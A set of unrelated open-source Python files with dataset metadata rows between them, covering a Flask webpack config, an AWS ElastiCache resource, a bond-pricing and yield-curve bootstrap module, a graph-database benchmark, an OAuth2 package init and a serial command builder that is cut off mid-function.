] | null | null | null | flask_webpack_bundle/config.py | briancappello/flask-webpack-bundle | 67896e6ade345e34721a8f9da156b65fc0646984 | [
"MIT"
] | null | null | null | import os
from flask_unchained import AppConfig
class Config(AppConfig):
    """Base config: locate the webpack-generated asset manifest."""
    # Path to the manifest.json emitted by the webpack build, under the
    # app's static folder.
    WEBPACK_MANIFEST_PATH = os.path.join(
        AppConfig.STATIC_FOLDER, 'assets', 'manifest.json')
class ProdConfig:
    """Production overrides."""
    # use relative paths by default, ie, the same host as the backend
    WEBPACK_ASSETS_HOST = ''
class StagingConfig(ProdConfig):
    """Staging inherits production's asset-host setting unchanged."""
    pass
| 18.944444 | 69 | 0.730205 | 43 | 341 | 5.651163 | 0.697674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 341 | 17 | 70 | 20.058824 | 0.883636 | 0.184751 | 0 | 0 | 0 | 0 | 0.068841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.111111 | 0.222222 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0b6fda84960a8cf5a23f750128dc700eaee71d2f | 2,458 | py | Python | touchdown/aws/elasticache/replication_group.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 14 | 2015-01-05T18:18:04.000Z | 2022-02-07T19:35:12.000Z | touchdown/aws/elasticache/replication_group.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 106 | 2015-01-06T00:17:13.000Z | 2019-09-07T00:35:32.000Z | touchdown/aws/elasticache/replication_group.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 5 | 2015-01-30T10:18:24.000Z | 2022-02-07T19:35:13.000Z | # Copyright 2014 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from touchdown.core import argument, output, serializers
from touchdown.core.plan import Plan
from ..common import SimpleApply, SimpleDescribe, SimpleDestroy
from .cache import BaseCacheCluster
class ReplicationGroup(BaseCacheCluster):
resource_name = "replication_group"
name = argument.String(
max=16, regex=r"[a-z1-9\-]{1,20}", field="ReplicationGroupId"
)
description = argument.String(
default=lambda resource: resource.name, field="ReplicationGroupDescription"
)
primary_cluster = argument.Resource(
"touchdown.aws.elasticache.cache.CacheCluster", field="PrimaryClusterId"
)
automatic_failover = argument.Boolean(field="AutomaticFailoverEnabled")
num_cache_clusters = argument.Integer(field="NumCacheClusters", update=False)
endpoint_address = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Address")
)
endpoint_port = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Port")
)
class Describe(SimpleDescribe, Plan):
resource = ReplicationGroup
service_name = "elasticache"
api_version = "2015-02-02"
describe_action = "describe_replication_groups"
describe_envelope = "ReplicationGroups"
describe_notfound_exception = "ReplicationGroupNotFoundFault"
key = "ReplicationGroupId"
class Apply(SimpleApply, Describe):
create_action = "create_replication_group"
update_action = "modify_replication_group"
waiter = "replication_group_available"
class Destroy(SimpleDestroy, Describe):
destroy_action = "delete_replication_group"
waiter = "replication_group_deleted"
def get_destroy_serializer(self):
return serializers.Dict(
ReplicationGroupId=serializers.Identifier(),
RetainPrimaryCluster=True if self.resource.primary_cluster else False,
)
| 32.773333 | 83 | 0.746542 | 269 | 2,458 | 6.702602 | 0.565056 | 0.033278 | 0.01442 | 0.017748 | 0.10538 | 0.063228 | 0.063228 | 0 | 0 | 0 | 0 | 0.012255 | 0.170057 | 2,458 | 74 | 84 | 33.216216 | 0.871569 | 0.223759 | 0 | 0 | 0 | 0 | 0.256072 | 0.182682 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0 | 0.093023 | 0.023256 | 0.697674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0b72b6b59c7098297806590340d0f99c8c866547 | 426 | py | Python | chartconvert/mpp.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | chartconvert/mpp.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | chartconvert/mpp.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | #! /usr/bin/env python
#
# vim: ts=2 sw=2 et
#
import sys
#from wx.py.crust import Display
# Print the map scale (1:x) for Web-Mercator zoom levels 0..30 at a given
# display DPI.  Python 2 script (print statements).
inchpm=39.3700  # inches per meter
dpi=100  # default display resolution; overridden by argv[1] when given
if len(sys.argv) >1:
  dpi=int(sys.argv[1])
# Meters of the real world represented by one screen pixel at this DPI.
displaympp=1/(float(dpi)*inchpm)
print "display mpp=%f"%(displaympp)
# Web-Mercator resolution (meters/pixel) at zoom 0 with 256px tiles:
# world circumference 2*20037508.34m over one 256px tile.
mpp= 20037508.342789244 * 2 / 256
print "Level : mpp \t\t: scale"
for i in range(0,31):
  # Scale denominator = ground meters per pixel / display meters per pixel.
  scale=mpp/displaympp
  print "level(%02d):%07.4f:\t\t1:%5.2f"%(i,mpp,scale)
  mpp=mpp/2  # each zoom level halves the meters-per-pixel resolution
| 16.384615 | 54 | 0.638498 | 78 | 426 | 3.487179 | 0.628205 | 0.051471 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133903 | 0.176056 | 426 | 25 | 55 | 17.04 | 0.641026 | 0.164319 | 0 | 0 | 0 | 0 | 0.216524 | 0.08547 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.076923 | null | null | 0.230769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b740ea892a08bb96379c733e82f7e4324d439a4 | 684 | py | Python | examples/driving_in_traffic/scenarios/loop/scenario.py | zbzhu99/SMARTS | 652aa23e71bd4e2732e2742140cfcd0ec082a7da | [
"MIT"
] | 2 | 2021-12-13T12:41:54.000Z | 2021-12-16T03:10:24.000Z | examples/driving_in_traffic/scenarios/loop/scenario.py | zbzhu99/SMARTS | 652aa23e71bd4e2732e2742140cfcd0ec082a7da | [
"MIT"
] | null | null | null | examples/driving_in_traffic/scenarios/loop/scenario.py | zbzhu99/SMARTS | 652aa23e71bd4e2732e2742140cfcd0ec082a7da | [
"MIT"
] | null | null | null | from pathlib import Path
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
traffic = t.Traffic(
flows=[
t.Flow(
route=t.RandomRoute(),
rate=60 * 60,
actors={t.TrafficActor(name="car", vehicle_type=vehicle_type): 1},
)
for vehicle_type in [
"passenger",
"bus",
"coach",
"truck",
"trailer",
"passenger",
"bus",
"coach",
"truck",
"trailer",
]
]
)
gen_scenario(
t.Scenario(
traffic={"basic": traffic},
),
output_dir=Path(__file__).parent,
)
| 20.117647 | 78 | 0.483918 | 65 | 684 | 4.938462 | 0.569231 | 0.102804 | 0.105919 | 0.143302 | 0.180685 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012077 | 0.394737 | 684 | 33 | 79 | 20.727273 | 0.763285 | 0 | 0 | 0.333333 | 0 | 0 | 0.096491 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0b7aa19dc4e53889b36908ba53b351bf9cbef5d2 | 6,444 | py | Python | calc/bond.py | RaphaelOneRepublic/financial-calculator | 2451b35a4cb52a6c254ae9fdae462dfebdc51e65 | [
"MIT"
] | 2 | 2020-12-10T13:00:43.000Z | 2020-12-19T16:59:48.000Z | calc/bond.py | RaphaelOneRepublic/financial-calculator | 2451b35a4cb52a6c254ae9fdae462dfebdc51e65 | [
"MIT"
] | null | null | null | calc/bond.py | RaphaelOneRepublic/financial-calculator | 2451b35a4cb52a6c254ae9fdae462dfebdc51e65 | [
"MIT"
] | null | null | null | import logging
from typing import Sequence
import numpy as np
from calc.optimize import root
class Bond(object):
    """
    Represents a coupon paying bond, priced with continuous compounding.

    Upon creation, the time to maturity, coupon periods per year, coupon rate must be provided.
    If yield to maturity is provided, bond value would be ignored.
    If yield to maturity is not provided, bond value would be used to compute the implied yield to maturity.
    Face value is assumed to be 100 if not provided.
    """

    def __init__(self, T: float, R: float, m: int = 2, y: float = None, F: float = 100, B: float = None):
        """
        construct a coupon paying bond
        :param T: time to maturity in years
        :param m: coupon payments per year
        :param R: quoted annual coupon rate, in percent of face value
        :param y: (implied) yield to maturity
        :param (optional) F: face value
        :param B: traded bond price
        :raises ValueError: if neither y nor B is given
        """
        self._T = T
        self._m = m
        self._R = R
        self._F = F
        if y is not None:
            # Yield given: price and sensitivities follow from it.
            self._y = y
            self.__refresh_value_cache__()
        elif B is not None:
            # Price given: the B setter solves for the implied yield.
            self.B = B
        else:
            raise ValueError("one of yield to maturity or bond price must be provided")

    def __refresh_value_cache__(self):
        """
        recompute cached bond properties.
        :return:
        """
        self.__refresh_primary_cache__()
        # Second derivative of price w.r.t. yield: sum t_i^2 * discounted CF.
        self._d2Bdy2 = np.sum(self._ts * self._ts * self._dcs)
        # Modified duration and convexity are derivatives scaled by price.
        self._duration = -self._dBdy / self._B
        self._convexity = self._d2Bdy2 / self._B

    def __refresh_primary_cache__(self):
        """
        recompute frequently accessed bond properties except for duration, convexity and second order derivative.
        :return:
        """
        # Coupon dates counted back from maturity, then reversed to
        # ascending order.  NOTE(review): -1 / self._m relies on true
        # division; under Python 2 integer division this would break.
        self._ts = np.arange(self._T, 0, -1 / self._m)[::-1]
        # Per-period coupon: R is quoted in percent of face value.
        self._cs = [self._R * self._F / 100 / self._m for _ in range(len(self._ts))]
        # Face value is repaid with the final coupon.
        self._cs[-1] += self._F
        # Continuously discounted cash flows, price, and dB/dy.
        self._dcs = np.exp(-self._y * self._ts) * self._cs
        self._B = np.sum(self._dcs)
        self._dBdy = float(np.sum(-self._ts * self._dcs))

    @property
    def T(self):
        """
        time to maturity
        :return:
        """
        return self._T

    @T.setter
    def T(self, value):
        self._T = value
        self.__refresh_value_cache__()

    @property
    def m(self):
        """
        coupon payments per year
        :return:
        """
        return self._m

    @m.setter
    def m(self, value):
        self._m = value
        self.__refresh_value_cache__()

    @property
    def R(self):
        """
        coupon rate
        :return:
        """
        return self._R

    @R.setter
    def R(self, value):
        self._R = value
        self.__refresh_value_cache__()

    @property
    def y(self):
        """
        yield to maturity
        :return:
        """
        return self._y

    @property
    def ytm(self):
        """
        yield to maturity (alias of y)
        :return:
        """
        return self._y

    @property
    def current(self):
        """
        the current yield of the bond
        = annual interest payment / bond price
        :return:
        """
        return self._R / 100 * self._F / self._B

    @property
    def bankeq(self):
        """
        the bank equivalent yield of the bond
        = (par - value) / par * 360 / days to maturity
        Only defined for zero-coupon bonds (R == 0).
        :return:
        """
        assert self._R == 0
        # 360/365 converts between the two day-count conventions.
        return (self._F - self._B) / self._F * 360 / (self._T * 365)

    @property
    def cdeq(self):
        """
        the money market equivalent yield of the bond
        = (par - value) / value * 360 / days to maturity
        Only defined for zero-coupon bonds (R == 0).
        :return:
        """
        assert self._R == 0
        return (self._F - self._B) / self._B * 360 / (self._T * 365)

    @y.setter
    def y(self, value):
        self._y = value
        self.__refresh_value_cache__()

    @property
    def B(self):
        """
        bond value
        :return:
        """
        return self._B

    @B.setter
    def B(self, value):
        # Solve B(y) = value for y with Newton's method.  Note that f
        # deliberately mutates self._y / the primary cache as it probes.
        def f(x):
            self._y = x
            self.__refresh_primary_cache__()
            return self._B - value

        def df(x: float):
            # dB/dy was cached by the preceding call to f.
            return self._dBdy
        try:
            # compute implied yield to maturity with initial guess = 0.1
            self.y = root(f, 0.1, df, epsilon=10e-9, delta=10e-9)
        except RuntimeError:
            logging.error("invalid bond value")

    @property
    def F(self):
        """
        face value
        :return:
        """
        return self._F

    @F.setter
    def F(self, value):
        self._F = value
        self.__refresh_value_cache__()

    @property
    def duration(self):
        """
        modified duration of the bond
        :return:
        """
        return self._duration

    @property
    def convexity(self):
        """
        convexity of the bond
        :return:
        """
        return self._convexity
def find_curve(bond, known: np.array, epsilon: float = 10e-10):
    """Extend a partially known zero curve out to this bond's maturity.

    The unknown tail of the curve is modeled as a straight line from the
    last known rate to a single free endpoint x, which is solved for so
    that the bond's cash flows discount to its price.

    :param bond: Bond whose price pins down the new curve points
    :param known: zero rates already bootstrapped (ascending maturities)
    :param epsilon: NOTE(review): currently unused
    :return: the known rates concatenated with the newly solved tail
    """
    # Cash-flow times, ascending.
    t = np.arange(bond.T, 0, - 1. / bond.m)[::-1]
    # NOTE(review): coupon here is bond.R / bond.m without the /100 and
    # face-value scaling used inside Bond -- confirm R's units for callers.
    c = np.array([bond.R / bond.m] * len(t))
    c[-1] += bond.F

    def f(x: float) -> float:
        # Candidate rates: linear from x down to the last known rate,
        # spliced after the known curve (drop its first point to align).
        r = np.linspace(x, known[-1], len(t) + 1 - len(known), endpoint=False)[::-1]
        rr = np.concatenate([known[1:], r])
        # Pricing error at this candidate endpoint.
        return float(np.sum(c * np.exp(-rr * t))) - bond.B

    def df(x: float) -> float:
        # Derivative of f w.r.t. the endpoint x: only the unknown tail
        # rates move, each proportionally to its position on the line.
        r = np.linspace(x, known[-1], len(t) + 1 - len(known), endpoint=False)[::-1]
        cc = c[len(known) - 1:]
        tt = t[len(known) - 1:]
        return float(np.sum(-cc * tt * np.exp(-r * tt) * np.arange(1, len(tt) + 1) / len(tt)))
    # Newton solve for the curve endpoint, then rebuild the full curve.
    x = root(f, 0.05, df=df)
    r = np.linspace(x, known[-1], len(t) + 1 - len(known), endpoint=False)[::-1]
    rr = np.concatenate([known[:], r])
    return rr
def bootstrap(bonds: Sequence[Bond], overnight: float, epsilon: float = 10e-10):
    """
    Bootstrap a zero rate curve from the given bonds and bond values.
    Note that the bonds must have equal coupon payment periods (equal <m>s).
    Zero rates at times for which we do not have a bond are calculated
    by a linear line connecting the two nearest rates at times for which we do have a bond.
    :param overnight: overnight rate seeding the curve
    :param epsilon: passed through for API symmetry (unused here)
    :param bonds: bonds supplying the price constraints
    :return: the bootstrapped zero-rate curve
    """
    # Process bonds from shortest to longest maturity, growing the curve
    # one bond at a time from the overnight rate.
    curve = [overnight]
    for bond in sorted(bonds, key=lambda b: b.T):
        curve = find_curve(bond, curve)
    return curve
| 24.689655 | 113 | 0.542675 | 850 | 6,444 | 3.96 | 0.207059 | 0.047534 | 0.047534 | 0.037433 | 0.264409 | 0.247772 | 0.232917 | 0.144682 | 0.144682 | 0.144682 | 0 | 0.018824 | 0.340472 | 6,444 | 260 | 114 | 24.784615 | 0.773176 | 0.260708 | 0 | 0.221311 | 0 | 0 | 0.017548 | 0 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.221311 | false | 0 | 0.032787 | 0.008197 | 0.409836 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b7b1e425f8017f791073b532d42d48a2786d924 | 171 | py | Python | 13.py | kwoshvick/project-euler | d27370b0f22b51ad9ccb15afa912983d8fd8be5c | [
"MIT"
] | null | null | null | 13.py | kwoshvick/project-euler | d27370b0f22b51ad9ccb15afa912983d8fd8be5c | [
"MIT"
] | null | null | null | 13.py | kwoshvick/project-euler | d27370b0f22b51ad9ccb15afa912983d8fd8be5c | [
"MIT"
] | null | null | null | file = open("13")
sum = 0
for numbers in file:
#print(numbers.rstrip())
numbers = int(numbers)
sum += numbers;
print(sum)
sum = str(sum)
print(sum[:10])
| 10.6875 | 28 | 0.596491 | 25 | 171 | 4.08 | 0.52 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038168 | 0.233918 | 171 | 15 | 29 | 11.4 | 0.740458 | 0.134503 | 0 | 0 | 0 | 0 | 0.013605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b8210f4f1d6486c1ca027ea81ba3795882b8a8f | 3,433 | py | Python | tests/python/benchmarks/two_neighborhood_bench.py | sid17/weaver | f9074397ca854a777a873eaf409621de679f9749 | [
"BSD-3-Clause"
] | 163 | 2015-01-02T03:51:38.000Z | 2022-03-21T23:06:39.000Z | tests/python/benchmarks/two_neighborhood_bench.py | sid17/weaver | f9074397ca854a777a873eaf409621de679f9749 | [
"BSD-3-Clause"
] | 1 | 2015-04-08T23:17:06.000Z | 2015-04-24T15:25:26.000Z | tests/python/benchmarks/two_neighborhood_bench.py | sid17/weaver | f9074397ca854a777a873eaf409621de679f9749 | [
"BSD-3-Clause"
] | 20 | 2015-02-17T19:24:05.000Z | 2020-10-29T01:59:18.000Z | #! /usr/bin/env python
#
# ===============================================================
# Description: Two neighborhood benchmark
#
# Created: 2014-03-21 13:39:06
#
# Author: Ayush Dubey, dubey@cs.cornell.edu
#
# Copyright (C) 2013-2014, Cornell University, see the LICENSE
# file for licensing agreement
# ===============================================================
#
import random
import sys
import time
import threading
import weaver.client as client
import simple_client
# Fixed seed so the benchmark's request pattern is reproducible.
random.seed(42)
num_edges = 1768149  # edge count of the input graph file
# Source vertex of each edge; populated from the graph file below.
edge_sources = [None] * num_edges
def choose_random_pair():
    """Return two (possibly identical) uniformly random edge-source vertices."""
    global edge_sources
    first = edge_sources[random.randint(0, num_edges - 1)]
    second = edge_sources[random.randint(0, num_edges - 1)]
    return (first, second)
# Load the edge list: one "src dst" pair per line, '#' lines are comments.
if (len(sys.argv) != 2):
    print "want single extra arg for file to open"
    assert(False)
f = open(sys.argv[1])
i = 0
for line in f:
    # NOTE(review): identity compare with 'is' works here only via CPython
    # string interning of single-char literals -- should be ==.
    if (line[0] is '#'):
        continue
    edge_sources[i] = int(line.split(" ")[0])
    i += 1
print "done loading file"
# Shared state for the start/finish barrier used by the worker threads.
num_started = 0
num_finished = 0
cv = threading.Condition()
num_nodes = 81306 # snap twitter-combined
read_percent = 95  # percentage of requests that are reads vs edge-writes
# node handles are range(0, num_nodes)
num_vts = 1  # number of weaver timestamper shards clients round-robin over
num_clients = 100
requests_per_client = 200
def add_labels(c, idx):
    # Write a 'name' property onto this client's share of the nodes in a
    # single transaction; client idx handles nodes where
    # node % num_clients == idx.
    global num_nodes
    tx_id = c.begin_tx()
    for i in range(num_nodes):
        # NOTE(review): 'is idx' relies on CPython small-int caching
        # (idx < 100 here); should be ==.
        if i % num_clients is idx:
            c.set_node_property(tx_id, i, 'name', str(i))
    assert(c.end_tx(tx_id))
    print "writing labels finished for client " + str(idx)
def exec_reads(reqs, sc, c, exec_time, idx):
    # Worker body: wait for the main thread's start signal, then issue the
    # mixed read/write workload and record this thread's elapsed time.
    global num_started
    global cv
    global num_clients
    global num_finished
    # Barrier: block until the main thread sets num_started = num_clients.
    with cv:
        while num_started < num_clients:
            cv.wait()
    start = time.time()
    cnt = 0
    for pair in reqs:
        cnt += 1
        # read_percent of requests are reads; the rest create an edge.
        if (random.randint(1,100) > read_percent) :
            tx_id = c.begin_tx()
            c.create_edge(tx_id, pair[0], pair[1])
            assert(c.end_tx(tx_id))
        else:
            two_neighborhood = sc.two_neighborhood(pair[0], "name", caching = True)
    end = time.time()
    # Tell the main thread this worker is done.
    with cv:
        num_finished += 1
        cv.notify_all()
    exec_time[idx] = end - start
# Build one weaver client (plus simple_client wrapper) per worker thread,
# round-robining over the available timestampers.
clients = []
simple_clients = []
for i in range(num_clients):
    clients.append(client.Client(client._CLIENT_ID + i, i % num_vts))
    simple_clients.append(simple_client.simple_client(clients[i]))
# Pre-generate every thread's request list so request generation is not
# measured inside the timed section.
reqs = []
for i in range(num_clients):
    cl_reqs = []
    for _ in range(requests_per_client):
        cl_reqs.append(choose_random_pair())
    reqs.append(cl_reqs)
exec_time = [0] * num_clients
threads = []
print "starting writes"
# Phase 1: label all nodes, one writer thread per client; wait for all.
for i in range(num_clients):
    thr = threading.Thread(target=add_labels, args=(clients[i], i))
    thr.start()
    threads.append(thr)
for thr in threads:
    thr.join()
print "starting requests"
# Phase 2: start the workers (they block on cv until released below).
# NOTE(review): threads still holds the joined writer threads; re-joining
# them at the end is harmless but sloppy.
for i in range(num_clients):
    thr = threading.Thread(target=exec_reads, args=(reqs[i], simple_clients[i], clients[i], exec_time, i))
    thr.start()
    threads.append(thr)
start_time = time.time()
# Release all workers at once, then wait until every one reports done.
with cv:
    num_started = num_clients
    cv.notify_all()
    while num_finished < num_clients:
        cv.wait()
end_time = time.time()
total_time = end_time-start_time
for thr in threads:
    thr.join()
print 'Total time for ' + str(num_clients * requests_per_client) + 'requests = ' + str(total_time)
throughput = (num_clients * requests_per_client) / total_time
print 'Throughput = ' + str(throughput)
| 26.206107 | 106 | 0.633265 | 492 | 3,433 | 4.227642 | 0.286585 | 0.0625 | 0.014423 | 0.026442 | 0.241827 | 0.161538 | 0.101923 | 0.075962 | 0.043269 | 0.043269 | 0 | 0.02567 | 0.217011 | 3,433 | 130 | 107 | 26.407692 | 0.74814 | 0.132537 | 0 | 0.23 | 0 | 0 | 0.057712 | 0 | 0 | 0 | 0 | 0 | 0.03 | 0 | null | null | 0 | 0.06 | null | null | 0.07 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b83f0ab273b13a1a169d3aa5355aab90ac31ca1 | 313 | py | Python | setup.py | cfbolz/syntaxerrors | 1c7ecc8fd0d05253d5c55dee39802cfb86fb69f7 | [
"Apache-2.0",
"OpenSSL"
] | 5 | 2018-04-11T15:19:53.000Z | 2020-10-27T15:23:18.000Z | setup.py | cfbolz/syntaxerrors | 1c7ecc8fd0d05253d5c55dee39802cfb86fb69f7 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | setup.py | cfbolz/syntaxerrors | 1c7ecc8fd0d05253d5c55dee39802cfb86fb69f7 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | from setuptools import setup, find_packages
# Package metadata for the syntaxerrors distribution.
setup(
    name='syntaxerrors',
    version='0.0.1',
    description='Report better SyntaxErrors',
    author='Carl Friedrich Bolz-Tereick',
    author_email='cfbolz@gmx.de',
    packages=['syntaxerrors'],
    package_dir={'': 'src'},  # package sources live under src/
    include_package_data=True,
)
| 24.076923 | 45 | 0.686901 | 36 | 313 | 5.833333 | 0.805556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011538 | 0.169329 | 313 | 12 | 46 | 26.083333 | 0.796154 | 0 | 0 | 0 | 0 | 0 | 0.313099 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b88cc0b918db3b0b9bc55668bf46c025033b785 | 2,237 | py | Python | authlib/oauth2/rfc6749/__init__.py | geoffwhittington/authlib | 096f2a41f4fb18f9850427f07d556d4b9ab97383 | [
"BSD-3-Clause"
] | null | null | null | authlib/oauth2/rfc6749/__init__.py | geoffwhittington/authlib | 096f2a41f4fb18f9850427f07d556d4b9ab97383 | [
"BSD-3-Clause"
] | null | null | null | authlib/oauth2/rfc6749/__init__.py | geoffwhittington/authlib | 096f2a41f4fb18f9850427f07d556d4b9ab97383 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
authlib.oauth2.rfc6749
~~~~~~~~~~~~~~~~~~~~~~
This module represents a direct implementation of
The OAuth 2.0 Authorization Framework.
https://tools.ietf.org/html/rfc6749
"""
from .wrappers import OAuth2Request, OAuth2Token, HttpRequest
from .errors import (
OAuth2Error,
AccessDeniedError,
MissingAuthorizationError,
InvalidGrantError,
InvalidClientError,
InvalidRequestError,
InvalidScopeError,
InsecureTransportError,
UnauthorizedClientError,
UnsupportedResponseTypeError,
UnsupportedGrantTypeError,
UnsupportedTokenTypeError,
# exceptions for clients
MissingCodeException,
MissingTokenException,
MissingTokenTypeException,
MismatchingStateException,
)
from .models import ClientMixin, AuthorizationCodeMixin, TokenMixin
from .authenticate_client import ClientAuthentication
from .authorization_server import AuthorizationServer
from .resource_protector import ResourceProtector, TokenValidator
from .token_endpoint import TokenEndpoint
from .grants import (
BaseGrant,
AuthorizationEndpointMixin,
TokenEndpointMixin,
AuthorizationCodeGrant,
ImplicitGrant,
ResourceOwnerPasswordCredentialsGrant,
ClientCredentialsGrant,
RefreshTokenGrant,
)
# Public API of the RFC 6749 implementation, grouped by origin module.
__all__ = [
    # wrappers
    'OAuth2Request', 'OAuth2Token', 'HttpRequest',
    # errors
    'OAuth2Error',
    'AccessDeniedError',
    'MissingAuthorizationError',
    'InvalidGrantError',
    'InvalidClientError',
    'InvalidRequestError',
    'InvalidScopeError',
    'InsecureTransportError',
    'UnauthorizedClientError',
    'UnsupportedResponseTypeError',
    'UnsupportedGrantTypeError',
    'UnsupportedTokenTypeError',
    # client-side exceptions
    'MissingCodeException',
    'MissingTokenException',
    'MissingTokenTypeException',
    'MismatchingStateException',
    # models
    'ClientMixin', 'AuthorizationCodeMixin', 'TokenMixin',
    # server components
    'ClientAuthentication',
    'AuthorizationServer',
    'ResourceProtector',
    'TokenValidator',
    'TokenEndpoint',
    # grants
    'BaseGrant',
    'AuthorizationEndpointMixin',
    'TokenEndpointMixin',
    'AuthorizationCodeGrant',
    'ImplicitGrant',
    'ResourceOwnerPasswordCredentialsGrant',
    'ClientCredentialsGrant',
    'RefreshTokenGrant',
]
| 27.617284 | 67 | 0.743406 | 127 | 2,237 | 13.031496 | 0.598425 | 0.029003 | 0.042296 | 0.084592 | 0.496677 | 0.496677 | 0.496677 | 0.496677 | 0.298489 | 0.298489 | 0 | 0.009672 | 0.168082 | 2,237 | 80 | 68 | 27.9625 | 0.879635 | 0.097452 | 0 | 0 | 0 | 0 | 0.333166 | 0.174874 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.029851 | 0.119403 | 0 | 0.119403 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b88fa702aed7c893ac61d3d5a2bd66384c1a59d | 1,613 | py | Python | scripts/serial_command.py | philip-long/singletact-python-wrapper | 659796f614116db77f31d6b0cc1e0c963104948e | [
"MIT"
] | null | null | null | scripts/serial_command.py | philip-long/singletact-python-wrapper | 659796f614116db77f31d6b0cc1e0c963104948e | [
"MIT"
] | null | null | null | scripts/serial_command.py | philip-long/singletact-python-wrapper | 659796f614116db77f31d6b0cc1e0c963104948e | [
"MIT"
] | null | null | null | TIMEOUT=100
def GenerateWriteCommand(i2cAddress, ID, writeLocation, data):
    """Build a framed I2C write command packet.

    Frame layout: 4x0xFF header | address | timeout | id | opcode(2=write) |
    location | payload length | payload | 0xFF | 4x0xFE trailer.
    """
    TIMEOUT = 100
    payload_len = len(data)
    command = bytearray(payload_len + 15)
    command[0:4] = b"\xff\xff\xff\xff"
    command[4] = i2cAddress
    command[5] = TIMEOUT
    command[6] = ID
    command[7] = 2  # opcode: write
    command[8] = writeLocation
